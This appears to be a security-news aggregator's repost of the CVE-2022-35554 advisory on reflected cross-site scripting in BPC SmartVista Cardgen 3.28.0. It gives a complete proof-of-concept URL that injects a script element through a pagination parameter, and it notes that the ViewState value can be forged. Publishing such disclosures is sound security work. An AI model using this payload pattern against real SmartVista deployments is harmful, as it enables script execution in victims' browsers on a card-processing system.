Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-35554: Reflected XSS in SmartVista Cardgen version 3.28.0 (CVE-2022-35554)

Multiple reflected XSS vulnerabilities occur when handling error message of BPC SmartVista version 3.28.0 allowing an attacker to execute javascript code at client side.

CVE
Open in Source
#xss#vulnerability#java

An attacker sends a draft URL https://[URL]/svcl/pages/monitoring/printingController.xhtml?javax.faces.partial.ajax=true&javax.faces.source=mainform%3AactiveProcesses&javax.faces.partial.execute=mainform%3AactiveProcesses&javax.faces.partial.render=mainform%3AactiveProcesses&mainform%3AactiveProcesses=mainform%3AactiveProcesses&mainform%3AactiveProcesses_pagination=true&mainform%3AactiveProcesses_first=6"]]><x:script+xmlns%3ax%3d"http%3a//www.w3.org/1999/xhtml">alert(document.domain)</x%3ascript>&mainform%3AactiveProcesses_rows=6&mainform%3AactiveProcesses_skipChildren=true&mainform%3AactiveProcesses_encodeFeature=true&mainform=mainform&mainform%3AactiveProcesses_selection=&mainform%3AactiveProcesses_scrollState=0%2C0&mainform%3Abatches_selection=&mainform%3Abatches_scrollState=0%2C0&mainform%3AprintEntries_selection=&mainform%3AprintEntries_scrollState=0%2C0&javax.faces.ViewState=0000000000000000000%3A0000000000000000000 to victim. When victim opens the URL, XSS will be triggered. In this URL, the javax.faces.ViewState parameter can be modified to have random value but having same length as value generated by application

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE